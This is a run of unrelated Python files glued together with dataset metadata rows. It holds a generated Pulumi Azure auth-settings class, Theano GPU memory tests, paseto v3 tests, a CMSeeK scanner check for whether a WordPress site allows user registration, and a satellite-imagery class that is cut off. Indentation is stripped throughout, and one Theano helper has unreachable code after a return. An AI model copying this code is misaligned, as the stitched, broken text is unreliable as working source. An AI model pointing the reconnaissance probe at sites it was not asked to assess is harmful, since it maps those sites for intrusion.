More information on OpenID Connect: http://openid.net/specs/openid-connect-core-1_0.html
:param pulumi.Input[str] client_secret: The Client Secret of this relying party application (in Azure Active Directory, this is also referred to as the Key).
This setting is optional. If no client secret is configured, the OpenID Connect implicit auth flow is used to authenticate end users.
Otherwise, the OpenID Connect Authorization Code Flow is used to authenticate end users.
More information on OpenID Connect: http://openid.net/specs/openid-connect-core-1_0.html
:param pulumi.Input[str] client_secret_certificate_thumbprint: An alternative to the client secret, that is the thumbprint of a certificate used for signing purposes. This property acts as
a replacement for the Client Secret. It is also optional.
:param pulumi.Input['BuiltInAuthenticationProvider'] default_provider: The default authentication provider to use when multiple providers are configured.
This setting is only needed if multiple providers are configured and the unauthenticated client
action is set to "RedirectToLoginPage".
:param pulumi.Input[bool] enabled: <code>true</code> if the Authentication / Authorization feature is enabled for the current app; otherwise, <code>false</code>.
:param pulumi.Input[str] facebook_app_id: The App ID of the Facebook app used for login.
This setting is required for enabling Facebook Login.
Facebook Login documentation: https://developers.facebook.com/docs/facebook-login
:param pulumi.Input[str] facebook_app_secret: The App Secret of the Facebook app used for Facebook Login.
This setting is required for enabling Facebook Login.
Facebook Login documentation: https://developers.facebook.com/docs/facebook-login
:param pulumi.Input[Sequence[pulumi.Input[str]]] facebook_o_auth_scopes: The OAuth 2.0 scopes that will be requested as part of Facebook Login authentication.
This setting is optional.
Facebook Login documentation: https://developers.facebook.com/docs/facebook-login
:param pulumi.Input[str] google_client_id: The OpenID Connect Client ID for the Google web application.
This setting is required for enabling Google Sign-In.
Google Sign-In documentation: https://developers.google.com/identity/sign-in/web/
:param pulumi.Input[str] google_client_secret: The client secret associated with the Google web application.
This setting is required for enabling Google Sign-In.
Google Sign-In documentation: https://developers.google.com/identity/sign-in/web/
:param pulumi.Input[Sequence[pulumi.Input[str]]] google_o_auth_scopes: The OAuth 2.0 scopes that will be requested as part of Google Sign-In authentication.
This setting is optional. If not specified, "openid", "profile", and "email" are used as default scopes.
Google Sign-In documentation: https://developers.google.com/identity/sign-in/web/
:param pulumi.Input[str] issuer: The OpenID Connect Issuer URI that represents the entity which issues access tokens for this application.
When using Azure Active Directory, this value is the URI of the directory tenant, e.g. https://sts.windows.net/{tenant-guid}/.
This URI is a case-sensitive identifier for the token issuer.
More information on OpenID Connect Discovery: http://openid.net/specs/openid-connect-discovery-1_0.html
:param pulumi.Input[str] kind: Kind of resource.
:param pulumi.Input[str] microsoft_account_client_id: The OAuth 2.0 client ID that was created for the app used for authentication.
This setting is required for enabling Microsoft Account authentication.
Microsoft Account OAuth documentation: https://dev.onedrive.com/auth/msa_oauth.htm
:param pulumi.Input[str] microsoft_account_client_secret: The OAuth 2.0 client secret that was created for the app used for authentication.
This setting is required for enabling Microsoft Account authentication.
Microsoft Account OAuth documentation: https://dev.onedrive.com/auth/msa_oauth.htm
:param pulumi.Input[Sequence[pulumi.Input[str]]] microsoft_account_o_auth_scopes: The OAuth 2.0 scopes that will be requested as part of Microsoft Account authentication.
This setting is optional. If not specified, "wl.basic" is used as the default scope.
Microsoft Account Scopes and permissions documentation: https://msdn.microsoft.com/en-us/library/dn631845.aspx
:param pulumi.Input[str] name: Name of web app.
:param pulumi.Input[str] resource_group_name: Name of the resource group to which the resource belongs.
:param pulumi.Input[str] runtime_version: The RuntimeVersion of the Authentication / Authorization feature in use for the current app.
The setting in this value can control the behavior of certain features in the Authentication / Authorization module.
:param pulumi.Input[str] slot: Name of web app slot. If not specified then will default to production slot.
:param pulumi.Input[float] token_refresh_extension_hours: The number of hours after session token expiration that a session token can be used to
call the token refresh API. The default is 72 hours.
:param pulumi.Input[bool] token_store_enabled: <code>true</code> to durably store platform-specific security tokens that are obtained during login flows; otherwise, <code>false</code>.
The default is <code>false</code>.
:param pulumi.Input[str] twitter_consumer_key: The OAuth 1.0a consumer key of the Twitter application used for sign-in.
This setting is required for enabling Twitter Sign-In.
Twitter Sign-In documentation: https://dev.twitter.com/web/sign-in
:param pulumi.Input[str] twitter_consumer_secret: The OAuth 1.0a consumer secret of the Twitter application used for sign-in.
This setting is required for enabling Twitter Sign-In.
Twitter Sign-In documentation: https://dev.twitter.com/web/sign-in
:param pulumi.Input['UnauthenticatedClientAction'] unauthenticated_client_action: The action to take when an unauthenticated client attempts to access the app.
:param pulumi.Input[bool] validate_issuer: Gets a value indicating whether the issuer should be a valid HTTPS url and be validated as such.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
__props__['additional_login_params'] = additional_login_params
__props__['allowed_audiences'] = allowed_audiences
__props__['allowed_external_redirect_urls'] = allowed_external_redirect_urls
__props__['client_id'] = client_id
__props__['client_secret'] = client_secret
__props__['client_secret_certificate_thumbprint'] = client_secret_certificate_thumbprint
__props__['default_provider'] = default_provider
__props__['enabled'] = enabled
__props__['facebook_app_id'] = facebook_app_id
__props__['facebook_app_secret'] = facebook_app_secret
__props__['facebook_o_auth_scopes'] = facebook_o_auth_scopes
__props__['google_client_id'] = google_client_id
__props__['google_client_secret'] = google_client_secret
__props__['google_o_auth_scopes'] = google_o_auth_scopes
__props__['issuer'] = issuer
__props__['kind'] = kind
__props__['microsoft_account_client_id'] = microsoft_account_client_id
__props__['microsoft_account_client_secret'] = microsoft_account_client_secret
__props__['microsoft_account_o_auth_scopes'] = microsoft_account_o_auth_scopes
if name is None and not opts.urn:
raise TypeError("Missing required property 'name'")
__props__['name'] = name
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__['resource_group_name'] = resource_group_name
__props__['runtime_version'] = runtime_version
if slot is None and not opts.urn:
raise TypeError("Missing required property 'slot'")
__props__['slot'] = slot
__props__['token_refresh_extension_hours'] = token_refresh_extension_hours
__props__['token_store_enabled'] = token_store_enabled
__props__['twitter_consumer_key'] = twitter_consumer_key
__props__['twitter_consumer_secret'] = twitter_consumer_secret
__props__['unauthenticated_client_action'] = unauthenticated_client_action
__props__['validate_issuer'] = validate_issuer
__props__['type'] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:web:WebAppAuthSettingsSlot"), pulumi.Alias(type_="azure-nextgen:web/latest:WebAppAuthSettingsSlot"), pulumi.Alias(type_="azure-nextgen:web/v20150801:WebAppAuthSettingsSlot"), pulumi.Alias(type_="azure-nextgen:web/v20160801:WebAppAuthSettingsSlot"), pulumi.Alias(type_="azure-nextgen:web/v20180201:WebAppAuthSettingsSlot"), pulumi.Alias(type_="azure-nextgen:web/v20181101:WebAppAuthSettingsSlot"), pulumi.Alias(type_="azure-nextgen:web/v20200601:WebAppAuthSettingsSlot"), pulumi.Alias(type_="azure-nextgen:web/v20200901:WebAppAuthSettingsSlot"), pulumi.Alias(type_="azure-nextgen:web/v20201001:WebAppAuthSettingsSlot")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(WebAppAuthSettingsSlot, __self__).__init__(
'azure-nextgen:web/v20190801:WebAppAuthSettingsSlot',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'WebAppAuthSettingsSlot':
"""
Get an existing WebAppAuthSettingsSlot resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
return WebAppAuthSettingsSlot(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="additionalLoginParams")
def additional_login_params(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
Login parameters to send to the OpenID Connect authorization endpoint when
a user logs in. Each parameter must be in the form "key=value".
"""
return pulumi.get(self, "additional_login_params")
@property
@pulumi.getter(name="allowedAudiences")
def allowed_audiences(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
Allowed audience values to consider when validating JWTs issued by
Azure Active Directory. Note that the <code>ClientID</code> value is always considered an
allowed audience, regardless of this setting.
"""
return pulumi.get(self, "allowed_audiences")
@property
@pulumi.getter(name="allowedExternalRedirectUrls")
def allowed_external_redirect_urls(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
External URLs that can be redirected to as part of logging in or logging out of the app. Note that the query string part of the URL is ignored.
This is an advanced setting typically only needed by Windows Store application backends.
Note that URLs within the current domain are always implicitly allowed.
"""
return pulumi.get(self, "allowed_external_redirect_urls")
@property
@pulumi.getter(name="clientId")
def client_id(self) -> pulumi.Output[Optional[str]]:
"""
The Client ID of this relying party application, known as the client_id.
This setting is required for enabling OpenID Connection authentication with Azure Active Directory or
other 3rd party OpenID Connect providers.
More information on OpenID Connect: http://openid.net/specs/openid-connect-core-1_0.html
"""
return pulumi.get(self, "client_id")
@property
@pulumi.getter(name="clientSecret")
def client_secret(self) -> pulumi.Output[Optional[str]]:
"""
The Client Secret of this relying party application (in Azure Active Directory, this is also referred to as the Key).
This setting is optional. If no client secret is configured, the OpenID Connect implicit auth flow is used to authenticate end users.
Otherwise, the OpenID Connect Authorization Code Flow is used to authenticate end users.
More information on OpenID Connect: http://openid.net/specs/openid-connect-core-1_0.html
"""
return pulumi.get(self, "client_secret")
@property
@pulumi.getter(name="clientSecretCertificateThumbprint")
def client_secret_certificate_thumbprint(self) -> pulumi.Output[Optional[str]]:
"""
An alternative to the client secret, that is the thumbprint of a certificate used for signing purposes. This property acts as
a replacement for the Client Secret. It is also optional.
"""
return pulumi.get(self, "client_secret_certificate_thumbprint")
@property
@pulumi.getter(name="defaultProvider")
def default_provider(self) -> pulumi.Output[Optional[str]]:
"""
The default authentication provider to use when multiple providers are configured.
This setting is only needed if multiple providers are configured and the unauthenticated client
action is set to "RedirectToLoginPage".
"""
return pulumi.get(self, "default_provider")
@property
@pulumi.getter
def enabled(self) -> pulumi.Output[Optional[bool]]:
"""
<code>true</code> if the Authentication / Authorization feature is enabled for the current app; otherwise, <code>false</code>.
"""
return pulumi.get(self, "enabled")
@property
@pulumi.getter(name="facebookAppId")
def facebook_app_id(self) -> pulumi.Output[Optional[str]]:
"""
The App ID of the Facebook app used for login.
This setting is required for enabling Facebook Login.
Facebook Login documentation: https://developers.facebook.com/docs/facebook-login
"""
return pulumi.get(self, "facebook_app_id")
@property
@pulumi.getter(name="facebookAppSecret")
def facebook_app_secret(self) -> pulumi.Output[Optional[str]]:
"""
The App Secret of the Facebook app used for Facebook Login.
This setting is required for enabling Facebook Login.
Facebook Login documentation: https://developers.facebook.com/docs/facebook-login
"""
return pulumi.get(self, "facebook_app_secret")
@property
@pulumi.getter(name="facebookOAuthScopes")
def facebook_o_auth_scopes(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
The OAuth 2.0 scopes that will be requested as part of Facebook Login authentication.
This setting is optional.
Facebook Login documentation: https://developers.facebook.com/docs/facebook-login
"""
return pulumi.get(self, "facebook_o_auth_scopes")
@property
@pulumi.getter(name="googleClientId")
def google_client_id(self) -> pulumi.Output[Optional[str]]:
"""
The OpenID Connect Client ID for the Google web application.
This setting is required for enabling Google Sign-In.
Google Sign-In documentation: https://developers.google.com/identity/sign-in/web/
"""
return pulumi.get(self, "google_client_id")
@property
@pulumi.getter(name="googleClientSecret")
def google_client_secret(self) -> pulumi.Output[Optional[str]]:
"""
The client secret associated with the Google web application.
This setting is required for enabling Google Sign-In.
Google Sign-In documentation: https://developers.google.com/identity/sign-in/web/
"""
return pulumi.get(self, "google_client_secret")
@property
@pulumi.getter(name="googleOAuthScopes")
def google_o_auth_scopes(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
The OAuth 2.0 scopes that will be requested as part of Google Sign-In authentication.
This setting is optional. If not specified, "openid", "profile", and "email" are used as default scopes.
Google Sign-In documentation: https://developers.google.com/identity/sign-in/web/
"""
return pulumi.get(self, "google_o_auth_scopes")
@property
@pulumi.getter
def issuer(self) -> pulumi.Output[Optional[str]]:
"""
The OpenID Connect Issuer URI that represents the entity which issues access tokens for this application.
When using Azure Active Directory, this value is the URI of the directory tenant, e.g. https://sts.windows.net/{tenant-guid}/.
This URI is a case-sensitive identifier for the token issuer.
More information on OpenID Connect Discovery: http://openid.net/specs/openid-connect-discovery-1_0.html
"""
return pulumi.get(self, "issuer")
@property
@pulumi.getter
def kind(self) -> pulumi.Output[Optional[str]]:
"""
Kind of resource.
"""
return pulumi.get(self, "kind")
@property
@pulumi.getter(name="microsoftAccountClientId")
def microsoft_account_client_id(self) -> pulumi.Output[Optional[str]]:
"""
The OAuth 2.0 client ID that was created for the app used for authentication.
This setting is required for enabling Microsoft Account authentication.
Microsoft Account OAuth documentation: https://dev.onedrive.com/auth/msa_oauth.htm
"""
return pulumi.get(self, "microsoft_account_client_id")
@property
@pulumi.getter(name="microsoftAccountClientSecret")
def microsoft_account_client_secret(self) -> pulumi.Output[Optional[str]]:
"""
The OAuth 2.0 client secret that was created for the app used for authentication.
This setting is required for enabling Microsoft Account authentication.
Microsoft Account OAuth documentation: https://dev.onedrive.com/auth/msa_oauth.htm
"""
return pulumi.get(self, "microsoft_account_client_secret")
@property
@pulumi.getter(name="microsoftAccountOAuthScopes")
def microsoft_account_o_auth_scopes(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
The OAuth 2.0 scopes that will be requested as part of Microsoft Account authentication.
This setting is optional. If not specified, "wl.basic" is used as the default scope.
Microsoft Account Scopes and permissions documentation: https://msdn.microsoft.com/en-us/library/dn631845.aspx
"""
return pulumi.get(self, "microsoft_account_o_auth_scopes")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Resource Name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="runtimeVersion")
def runtime_version(self) -> pulumi.Output[Optional[str]]:
"""
The RuntimeVersion of the Authentication / Authorization feature in use for the current app.
The setting in this value can control the behavior of certain features in the Authentication / Authorization module.
"""
return pulumi.get(self, "runtime_version")
@property
@pulumi.getter(name="tokenRefreshExtensionHours")
def token_refresh_extension_hours(self) -> pulumi.Output[Optional[float]]:
"""
The number of hours after session token expiration that a session token can be used to
call the token refresh API. The default is 72 hours.
"""
return pulumi.get(self, "token_refresh_extension_hours")
@property
@pulumi.getter(name="tokenStoreEnabled")
def token_store_enabled(self) -> pulumi.Output[Optional[bool]]:
"""
<code>true</code> to durably store platform-specific security tokens that are obtained during login flows; otherwise, <code>false</code>.
The default is <code>false</code>.
"""
return pulumi.get(self, "token_store_enabled")
@property
@pulumi.getter(name="twitterConsumerKey")
def twitter_consumer_key(self) -> pulumi.Output[Optional[str]]:
"""
The OAuth 1.0a consumer key of the Twitter application used for sign-in.
This setting is required for enabling Twitter Sign-In.
Twitter Sign-In documentation: https://dev.twitter.com/web/sign-in
"""
return pulumi.get(self, "twitter_consumer_key")
@property
@pulumi.getter(name="twitterConsumerSecret")
def twitter_consumer_secret(self) -> pulumi.Output[Optional[str]]:
"""
The OAuth 1.0a consumer secret of the Twitter application used for sign-in.
This setting is required for enabling Twitter Sign-In.
Twitter Sign-In documentation: https://dev.twitter.com/web/sign-in
"""
return pulumi.get(self, "twitter_consumer_secret")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Resource type.
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="unauthenticatedClientAction")
def unauthenticated_client_action(self) -> pulumi.Output[Optional[str]]:
"""
The action to take when an unauthenticated client attempts to access the app.
"""
return pulumi.get(self, "unauthenticated_client_action")
@property
@pulumi.getter(name="validateIssuer")
def validate_issuer(self) -> pulumi.Output[Optional[bool]]:
"""
Gets a value indicating whether the issuer should be a valid HTTPS url and be validated as such.
"""
return pulumi.get(self, "validate_issuer")
def translate_output_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
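# --- usage sketch, not part of the generated file (names and enum values are assumptions) ---
# auth = WebAppAuthSettingsSlot(
#     "staging-auth",
#     name="my-web-app",
#     resource_group_name="my-resource-group",
#     slot="staging",
#     enabled=True,
#     default_provider="AzureActiveDirectory",              # assumed enum value
#     unauthenticated_client_action="RedirectToLoginPage",  # assumed enum value
# )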
| 58.647182
| 706
| 0.69041
|
4a146f4fe3df7bbe0bc1aff305b25f7c5aaefed4
| 7,042
|
py
|
Python
|
theano/sandbox/cuda/tests/test_memory.py
|
ganguli-lab/Theano
|
d61c929b6d1a5bae314545cba79c879de687ea18
|
[
"BSD-3-Clause"
] | 1
|
2019-01-26T01:53:46.000Z
|
2019-01-26T01:53:46.000Z
|
theano/sandbox/cuda/tests/test_memory.py
|
ganguli-lab/Theano
|
d61c929b6d1a5bae314545cba79c879de687ea18
|
[
"BSD-3-Clause"
] | null | null | null |
theano/sandbox/cuda/tests/test_memory.py
|
ganguli-lab/Theano
|
d61c929b6d1a5bae314545cba79c879de687ea18
|
[
"BSD-3-Clause"
] | null | null | null |
import gc
import numpy as np
import theano
from theano import tensor
from theano.sandbox import cuda
from theano import ifelse
# Skip test if cuda_ndarray is not available.
from nose.plugins.skip import SkipTest
if not cuda.cuda_available:
raise SkipTest('Optional package cuda disabled')
if theano.config.mode == 'FAST_COMPILE':
mode_with_gpu = theano.compile.mode.get_mode('FAST_RUN').including('gpu')
else:
mode_with_gpu = theano.compile.mode.get_default_mode().including('gpu')
def freemem(extra_alloc=0, extra_size=0):
    """
    Return a tuple describing gpu memory usage: a label, the number of
    outstanding mallocs (plus extra_alloc) and, when available, the memory
    Theano allocated in KB (plus extra_size).
    """
    gc.collect()
    gc.collect()
    gc.collect()
    n_mallocs = cuda.cuda_ndarray.cuda_ndarray.outstanding_mallocs()
    if hasattr(cuda.cuda_ndarray.cuda_ndarray, "theano_allocated"):
        theano_alloc = cuda.cuda_ndarray.cuda_ndarray.theano_allocated()
        return ("(n malloc/theano mem allocated in KB)",
                n_mallocs + extra_alloc,
                int(theano_alloc / 1024) + extra_size)
    return ("n malloc on the gpu", n_mallocs + extra_alloc)
# I don't use the following by default as if there is other stuff running
# on the GPU, this won't work.
mem_info = cuda.cuda_ndarray.cuda_ndarray.mem_info()
gpu_used = (mem_info[1] - mem_info[0]) / 1024 ** 2
mem_info_msg = "(n malloc/gpu mem used in MB)"
return (mem_info_msg, n_mallocs, int(gpu_used))
def test_memory():
"""
We test that we do not keep link to memory between Theano function call
and during Theano compilation
The origin of this code come from Aaron Vandenoord and Sander Dieleman.
I have their autorisation to put this in Theano with the Theano license.
note::
This test can fail if there is other process running on the gpu.
"""
shapes = (200, 100)
    # more_alloc1 and more_alloc2 are not the same for both dtypes.
    # When dtype is float32, the computation is done on the gpu.
    # This inserts constants on the gpu during compilation,
    # which raises the number of allocations.
    # When dtype is float64, only the shared variable is on the gpu and it is
    # transferred to the cpu for computation, so there is no extra allocation
    # after compilation.
    # more_alloc1 applies after the first compilation, more_alloc2 after the second.
for dtype, more_alloc1, more_alloc2 in [("float32", 1, 4),
("float64", 0, 0)]:
        print(dtype)
test_params = np.asarray(np.random.randn(np.prod(shapes)), dtype)
some_vector = tensor.vector('some_vector', dtype=dtype)
some_matrix = some_vector.reshape(shapes)
mem1 = freemem()
print "Before shared variable", mem1
variables = cuda.shared_constructor(np.ones((shapes[1],),
dtype='float32'))
derp = tensor.sum(tensor.dot(some_matrix[:shapes[0]], variables))
print "Shared took ", np.prod(variables.get_value(
borrow=True,
return_internal_type=True).shape) * 4 / 1024, "kB"
mem2 = freemem()
print "Before compilation", mem2
mem2_1 = freemem(extra_alloc=more_alloc1)
mem2_2 = freemem(extra_alloc=more_alloc2)
obj = theano.function([some_vector], derp, mode=mode_with_gpu)
mem3 = freemem()
print "After function compilation 1", mem3
assert mem2_1 == mem3, (mem2_1, mem3)
grad_derp = tensor.grad(derp, some_vector)
grad = theano.function([some_vector], grad_derp, mode=mode_with_gpu)
mem4 = freemem()
print "After function compilation 2", mem4
assert mem2_2 == mem4, (mem2_2, mem4)
for i in range(3):
obj(test_params)
print "After function evaluation 1", freemem()
assert mem2_2 == freemem(), (mem2_2, freemem())
grad(test_params)
print "After function evaluation 2", freemem()
assert mem2_2 == freemem(), (mem2_2, freemem())
del obj
#print "After deleting function 1", freemem()
#assert mem2 == freemem(), (mem2, freemem())
del grad
print "After deleting function 2", freemem()
assert mem2 == freemem(), (mem2, freemem())
del derp, variables, grad_derp
print "After deleting shared variable and ref to it", freemem()
assert mem1 == freemem(), (mem1, freemem())
def test_memory_lazy():
"""As test_memory, but with the ifelse op.
We need to test it as the ifelse op with the [c]vm create op not
executed in the graph. This mess with [c]vm gc implementation.
"""
shapes = (50, 100)
    # more_alloc1 and more_alloc2 are not the same for both dtypes.
    # When dtype is float32, the computation is done on the gpu.
    # This inserts constants on the gpu during compilation,
    # which raises the number of allocations.
    # When dtype is float64, only the shared variable is on the gpu and it is
    # transferred to the cpu for computation, so there is no extra allocation
    # after compilation.
    # more_alloc1 applies after the first compilation, more_alloc2 after the second.
for dtype, more_alloc1 in [("float32", 2),
("float64", 0)]:
        print(dtype)
test_params = np.asarray(np.random.randn(np.prod(shapes)), dtype)
some_vector = tensor.vector('some_vector', dtype=dtype)
some_matrix = some_vector.reshape(shapes)
branch_select = tensor.iscalar()
mem1 = freemem()
print "Before shared variable", mem1
variables = cuda.shared_constructor(np.ones((shapes[1],),
dtype='float32'))
derp = tensor.sum(tensor.dot(some_matrix[:shapes[0]], variables))
derp = ifelse.IfElse(1)(branch_select,
derp, some_matrix[:shapes[0]].sum())
derp += 1
print "Shared took ", np.prod(variables.get_value(
borrow=True,
return_internal_type=True).shape) * 4 / 1024, "kB"
mem2 = freemem()
print "Before compilation", mem2
mem2_1 = freemem(extra_alloc=more_alloc1)
obj = theano.function([some_vector, branch_select], derp,
mode=mode_with_gpu)
#theano.printing.debugprint(obj, print_type=True)
mem3 = freemem()
print "After function compilation 1", mem3
assert mem2_1 == mem3, (mem2_1, mem3)
for i in range(3):
obj(test_params, 1)
print "After function evaluation branch true", freemem()
assert mem2_1 == freemem(), (mem2_1, freemem())
obj(test_params, 0)
print "After function evaluation branch false", freemem()
assert mem2_1 == freemem(), (mem2_1, freemem())
del obj
print "After deleting function 1", freemem()
assert mem2 == freemem(), (mem2, freemem())
del derp, variables
print "After deleting shared variable and ref to it", freemem()
assert mem1 == freemem(), (mem1, freemem())
| 39.561798
| 79
| 0.627237
|
4a146fb799806b4ec13e6740eb0c6107a2c44522
| 2,354
|
py
|
Python
|
tests/test_v3.py
|
SrivathshanKS/pypaseto
|
191583939421c876f6bdf5c2656aa023eeddf58b
|
[
"MIT"
] | 93
|
2018-03-10T17:15:06.000Z
|
2022-03-28T09:36:09.000Z
|
tests/test_v3.py
|
SrivathshanKS/pypaseto
|
191583939421c876f6bdf5c2656aa023eeddf58b
|
[
"MIT"
] | 15
|
2018-03-09T16:21:32.000Z
|
2021-09-17T17:20:51.000Z
|
tests/test_v3.py
|
SrivathshanKS/pypaseto
|
191583939421c876f6bdf5c2656aa023eeddf58b
|
[
"MIT"
] | 13
|
2018-03-09T15:50:01.000Z
|
2022-03-28T09:59:18.000Z
|
import json
import pytest
import paseto
from unittest import mock
from paseto.protocols.v3 import ProtocolVersion3
from paseto.keys.asymmetric_key import AsymmetricSecretKey, AsymmetricPublicKey
from paseto.keys.symmetric_key import SymmetricKey
import secrets
def test_v3_local_keygen():
test_v3_local_key = ProtocolVersion3.generate_symmetric_key()
assert test_v3_local_key.protocol is ProtocolVersion3
def test_v3_public_keygen():
test_v3_public_secret_key = ProtocolVersion3.generate_asymmetric_secret_key()
assert test_v3_public_secret_key.protocol is ProtocolVersion3
test_v3_public_public_key = test_v3_public_secret_key.get_public_key()
assert test_v3_public_public_key.protocol is ProtocolVersion3
def test_create_local():
test_v3_local_key = ProtocolVersion3.generate_symmetric_key()
token = paseto.create(
key=test_v3_local_key,
claims={"test": [1, 2, 3]},
purpose="local",
exp_seconds=100,
footer="hello",
)
assert token is not None
assert token.startswith("v3.")
parsed = paseto.parse(test_v3_local_key, token)
assert parsed
def test_create_public():
test_v3_public_secret_key = ProtocolVersion3.generate_asymmetric_secret_key()
test_v3_public_public_key = test_v3_public_secret_key.get_public_key()
token = paseto.create(
key=test_v3_public_secret_key,
claims={"test": [1, 2, 3]},
purpose="public",
exp_seconds=100,
footer="hello",
)
assert token is not None
assert token.startswith("v3.")
parsed = paseto.parse(key=test_v3_public_public_key, token=token)
assert parsed
def test_key_gen():
symmetric = ProtocolVersion3.generate_symmetric_key()
secret = ProtocolVersion3.generate_asymmetric_secret_key()
assert isinstance(symmetric, SymmetricKey)
assert isinstance(secret, AsymmetricSecretKey)
assert isinstance(secret.get_public_key(), AsymmetricPublicKey)
assert ProtocolVersion3.symmetric_key_byte_length == len(symmetric.key)
assert len(secret.key) >= 48
# TODO: support importing secret key from this format
    asymmetric2 = AsymmetricSecretKey(
        key_material=b"\x7f" + secrets.token_bytes(47), protocol=ProtocolVersion3
    )
    pk = asymmetric2.get_public_key()
assert isinstance(pk, AsymmetricPublicKey)
| 30.973684
| 81
| 0.754036
|
4a14708c9a73ab01c7eec76c86020f282291a299
| 829
|
py
|
Python
|
.modules/.CMSeeK/deepscans/wp/check_reg.py
|
termux-one/EasY_HaCk
|
0a8d09ca4b126b027b6842e02fa0c29d8250e090
|
[
"Apache-2.0"
] | 1,103
|
2018-04-20T14:08:11.000Z
|
2022-03-29T06:22:43.000Z
|
.modules/.CMSeeK/deepscans/wp/check_reg.py
|
sshourya948/EasY_HaCk
|
0a8d09ca4b126b027b6842e02fa0c29d8250e090
|
[
"Apache-2.0"
] | 29
|
2019-04-03T14:52:38.000Z
|
2022-03-24T12:33:05.000Z
|
.modules/.CMSeeK/deepscans/wp/check_reg.py
|
sshourya948/EasY_HaCk
|
0a8d09ca4b126b027b6842e02fa0c29d8250e090
|
[
"Apache-2.0"
] | 161
|
2018-04-20T15:57:12.000Z
|
2022-03-15T19:16:16.000Z
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
# This is a part of CMSeeK, check the LICENSE file for more information
# Copyright (c) 2018 Tuhinshubhra
# http://localhost/wordpress/wordpress/wp-login.php?action=register
import cmseekdb.basic as cmseek
def start(url,ua):
reg_url = url + '/wp-login.php?action=register'
cmseek.info('Checking user registration status')
reg_source = cmseek.getsource(reg_url, ua)
reg_status = '0'
if reg_source[0] == '1' and '<form' in reg_source[1]:
if 'Registration confirmation will be emailed to you' in reg_source[1] or 'value="Register"' in reg_source[1] or 'id="user_email"' in reg_source[1]:
cmseek.success('User registration open: ' + cmseek.bold + cmseek.fgreen + reg_url + cmseek.cln)
reg_status = '1'
return [reg_status, reg_url]
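# --- usage sketch, not part of the original module (URL and user agent are made up) ---
#   status, reg_url = start('http://example.com/wordpress', 'Mozilla/5.0')
#   # status is '1' when registration looks open, '0' otherwise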
| 41.45
| 156
| 0.687575
|
4a14718f86d9db27691df2df57b61ece403bcd72
| 3,257
|
py
|
Python
|
pygaarst/ali.py
|
chryss/pygaarst
|
6e91180d063e4289cf2ea7a0261b231030e37dae
|
[
"MIT"
] | 42
|
2015-02-25T21:39:23.000Z
|
2021-11-22T04:48:34.000Z
|
pygaarst/ali.py
|
chryss/pygaarst
|
6e91180d063e4289cf2ea7a0261b231030e37dae
|
[
"MIT"
] | 12
|
2015-04-20T19:09:17.000Z
|
2017-07-21T21:38:43.000Z
|
pygaarst/ali.py
|
chryss/pygaarst
|
6e91180d063e4289cf2ea7a0261b231030e37dae
|
[
"MIT"
] | 15
|
2015-04-03T19:16:14.000Z
|
2022-03-28T11:32:36.000Z
|
# coding: utf-8
"""
**pygaarst.ali**
**ALI-specific classes.**
*Refactored out of pygaarst.raster by Chris Waigl on 2014-11-14.*
"""
from __future__ import division, print_function, absolute_import
from builtins import str
from builtins import range
import os.path
import logging
import pygaarst.irutils as ir
from pygaarst.rasterhelpers import PygaarstRasterError
from pygaarst.usgsl1 import USGSL1scene, USGSL1band, _validate_platformorigin
logging.basicConfig(level=logging.DEBUG)
LOGGER = logging.getLogger('pygaarst.ali')
class ALIscene(USGSL1scene):
"""
A container object for EO-1 ALI scenes. Input: directory name,
which is expected to contain all scene files.
"""
def __init__(self, dirname):
super(ALIscene, self).__init__(dirname)
self.permissiblebandid = [str(num) for num in range(1, 11)]
_validate_platformorigin('ALI', self.spacecraft, self.sensor)
def __getattr__(self, bandname):
"""
        Override __getattr__() for band names of the form bandN, with N in the
        bands permissible for ALI.
(See https://eo1.usgs.gov/sensors/hyperioncoverage).
Warn if band is non-calibrated.
Allows for infixing the filename just before the .TIF extension for
pre-processed bands.
"""
# see https://eo1.usgs.gov/sensors/hyperioncoverage
isband = False
head, _, tail = bandname.lower().partition('band')
try:
band = tail.upper()
if head == '':
if band in self.permissiblebandid:
isband = True
else:
                    raise PygaarstRasterError(
                        "EO-1 ALI does not have a band %s. "
                        "Permissible band labels are between 1 and 10." % band)
except ValueError:
pass
if isband:
# Note: Landsat 7 has low and high gain bands 6,
# with different label names
keyname = "BAND%s_FILE_NAME" % band
bandfn = self.meta['PRODUCT_METADATA'][keyname]
base, ext = os.path.splitext(bandfn)
postprocessfn = base + self.infix + ext
bandpath = os.path.join(self.dirname, postprocessfn)
self.bands[band] = ALIband(bandpath, band=band, scene=self)
